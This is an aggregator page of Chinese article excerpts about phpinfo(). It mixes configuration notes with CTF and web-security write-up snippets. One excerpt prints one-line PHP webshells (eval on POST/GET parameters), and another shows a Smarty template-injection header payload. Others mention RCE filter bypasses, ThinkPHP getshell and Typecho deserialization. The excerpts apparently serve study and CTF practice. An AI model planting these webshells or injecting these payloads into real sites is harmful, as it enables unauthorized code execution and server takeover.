ICode9

精准搜索请尝试: 精确搜索
  • 从phpinfo中能获取哪些敏感信息2022-07-27 11:35:43

    https://cloud.tencent.com/developer/article/1196798phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个 phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从 phpinfo()中获得哪些敏感信息呢?php 版本这种就不

  • 取反、异或绕过preg_match()过滤所有字母数字2022-07-09 04:31:08

    捞到代码,在本地搭建,源码(rce.php): <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");

  • 修改服务器端的配置文件时遇到的问题2022-04-14 17:00:57

    今天碰到一个bug。 有一个视频的上传操作,怎么都是失败。 但是神奇的地方在于,test服务器上可行,admin上不可行。 比对了代码,确认业务代码都一致。 那么问题肯定是出现在了服务器端。 于是我分别打印了两个服务器上的 phpinfo(); 我发现,在test服务器上,upload_max_files

  • 中职组网络安全代码审计基础-PHP危险函数及特殊函数2022-01-07 10:32:47

    首先就是phpinfo()这个函数,这个函数的主要作用就是查看网站上的各种信息: 随后我们来进行访问网站: 就看到网站上的各种信息。 其中这两个函数的开启和文件包含漏洞有关:   下一个危险函数就是eval()函数了 这个函数的主要作用就是执行php函数,通常在写一句话木马的时候使

  • 代码执行漏洞(DouPHP)2021-12-29 23:36:47

    目录代码执行漏洞函数DouPHP 代码执行漏洞 用户输入的数据被当作后端代码执行 后端代码:PHP、ASP、ASPX、JSP 一句话木马就是最经典的代码执行 RCE (remote command/code execute)远程命令或者代码执行 现在由于 RCE 这个词的滥用,范围较为广泛,可以理解为渗透的最终情况可以实现

  • [DASCTF Oct] 迷路的魔法少女2021-11-24 17:35:13

    简单的代码注入,但是因为太懒了,十月打的比赛十一月底才想起来写个Wp,以后再也不当懒狗了 题目: <?php highlight_file('index.php'); extract($_GET); error_reporting(0); function String2Array($data) { if($data == '') return array(); @eval("\$array = $data;");

  • Upload-labs Pass-082021-11-13 13:58:45

    在window的时候如果文件名+":: D A T A " 会 把 :

  • 【网络安全】一次实战中对tp5网站getshell方式的测试2021-10-27 15:31:58

    前言 之前接触tp5的站比较少,只知道利用RCE漏洞getshell的方式。在最近对一个发卡平台渗透的过程中,由于php版本限制,无法直接使用RCE的payload拿shell,于是结合该网站尽可能多的测试一下tp5+php7.1环境下的getshell方法。 【查看资料】 正文 拿到站点后,访问首页如下 不过看不出

  • php小马2021-10-17 09:33:45

     <?php eval(@$_POST['a']); ?>   如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”, <?php @eval($_GET['a']);?> (就像这样: http://127.0.0.1/upload/a0.php?a=phpinfo();)     https://www.jianshu.com/p/90473b8e6667

  • phpinfo应注意什么2021-10-04 21:02:50

    phpinfo应注意什么 1.allow_url_fopen和allow_url_include 这个配置选项可以知道在PHP文件包含中可以使用哪些伪协议 2.PHP版本 3.open_basedir 这个配置选项可以知道PHP将访问目录限制在哪个目录下 4.disable_functions 可以在命令执行的时候,看那些函数被禁了 5.se

  • 路由2021-09-08 17:34:38

    use Illuminate\Support\Facades\Route; Route::get('/', function () { return view('welcome'); }); Route::get('phpinfo', function () { return phpinfo(); }); Route::prefix('test') ->namespace('Ap

  • 第六十三题——[CISCN2019 华东南赛区]Web112021-05-10 10:06:13

    题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,看到提示Smarty,猜测使用模板注入漏洞 第二步:构建漏洞 使用burpsuite改包,添加X-Forwarded-For头,X-Forwarded-For:{if phpinfo()}{/if},发现执行了phpinfo() 第三步:获取flag 使用X-Forwarded-For:{if readfile('/

  • 第五十九题——[NPUCTF2020]ReadlezPHP2021-05-08 15:02:16

    题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,按f12查看源码,看到一个跳转提示:/time.php?source 第二步:查看time.php界面,发现源代码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){

  • Vuln-Range之php命令注入2021-04-04 22:32:45

    1.开启靶场 简介显示有phpcode注入漏洞,简单绕过之后就可以执行phpinfo(),拿到flag啦。 通过传入name参数的值就可以来进行代码注入了。 2.随便试一个值 http://192.168.0.20:32769/?name=phpinfo() 果然没有那么简单,被过滤了。 3.查看源码   我不太懂php的代码,查阅了一下,可

  • php 安装 imagick扩展失败 ,phpinfo一直不显示2021-02-21 11:32:42

    环境:windows+小皮面板 ,php版本:7.3.4nts ,最后安装成功的imagick扩展版本:php_imagick-3.4.4-7.3-nts-vc15-x64。 参考博客:https://www.cnblogs.com/sanplit/p/7818635.html     php 安装 imagick扩展 https://www.cnblogs.com/jinxiblog/p/8053008.html   php 安装 imagick扩展

  • 使用php -i或者phpinfo()查看php安装、配置信息2021-02-10 14:02:00

    使用前提 你必须正确的安装了php。 在windows下使用命令 后面的内容会在控制台中执行一些命令,对于Linux&Mac的同学来说,只要正确安装了php,直接执行命令就好,但对于Windows下的同学,如果没有配置,是无法直接执行php命令的。所以在这里先介绍一个执行php命令的简单方法: 进入php安装目

  • 二十六:XSS跨站之订单及shell箱子反杀2021-01-23 09:01:03

    寻找留言板,和数据库进行交互的面板 xss平台的使用 postman软件 WEBSHELL箱子管理系统 用beff反拿到订单管理系统的shell,进行社工,以及钓鱼各种操作。 kali开启beef, 跨站漏洞存在于管理员浏览数据,才能触发xss跨站。 XSS盲打:瞎几把打,只要存在一处就行。拿到cookie还得查看是否

  • phpinfo页面展开的渗透2020-12-29 15:34:09

    一.如何获取该页面 1.目录扫描器 burp、御剑、DirBuster.... 2.通过Google Hacking语法搜索 3.⽹站⾃有功能 4.同个服务器的其他站点  因为一个服务器上可以存在多个网站。当同一个服务器上的一个网站不存在或者搜索不到phpinfo页面的时候,我们可以通过真实ip去访问其他站点,查看

  • 文件包含2020-12-23 12:02:56

    一、漏洞产生的函数 include() include_once() //检查是否已经包含,如果包含,就不再执行包含 require() require_once() include与require最大的区别在于,如果包含的文件存在错误;那么include弹出警告,脚本继续执行。而require会终止运行脚本 二、包含类型 1、本地包含 2、

  • 攻防世界 Web_php_include write up2020-11-27 22:04:40

    dirbuster  扫目录   发现phpinfo()可以看到绝对路径   和  phpmyadmin进入phpmyadmin页面   root直接空密码登录查看phpmyadmin变量 secure file priv 值为空  说明可以写入一句话load_file()可以读取任意文件.......在经过各种尝试写人一句话再用文件包含读取的过程中.

  • 代码审计原理之代码执行2020-08-09 12:31:36

    0x01 代码执行 PHP代码执行漏洞可以将代码注入到应用中,最终到webserver去执行,该漏洞主要存在于eval()、assert()、preg_replace()、call_user_func()、array_map()以及动态函数中 eval(); assert(); preg_replace(); preg_replace():加上模式修饰符也会造成代码执行 关于模式修饰

  • [SUCTF 2019]EasyWeb2020-05-18 21:06:43

    知识点 无字母getshell 题目给了源码 <?php function get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if(!file_exists($userdir)){ mkdir($userdir);

  • xdebug安装2020-04-22 09:08:44

      一、下载xdebug   xdebug官网:https://xdebug.org/download.php   在选择下载哪个版本的xdebug的时候需要注意了,下面有两种方法,让你准确的下载自己环境对应的xdebug文件:   1>.打印出phpinfo()信息,如下:        然后还要注意一点就是看看自己php对应的版本和操作系

  • 刷 攻防世界 记录 (持续更新)2020-03-28 09:52:35

      Web 2  按照他的逻辑反过来就行了 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; $_o=base64_decode(strrev(str_rot13($miwen))); for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1); $__=ord($_

  • typecho反序列化漏洞2020-03-04 14:44:11

    漏洞介绍 Typecho是一个简单,轻巧的博客程序。基于PHP,使用多种数据库(Mysql,PostgreSQL,SQLite)储存数据。在GPL Version 2许可证下发行,是一个开源的程序,目前使用SVN来做版本管理 漏洞形成 由于源码的以下几行存在反序列化漏洞与逻辑绕过,形成漏洞 漏洞利用 思路: 由于install.p

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有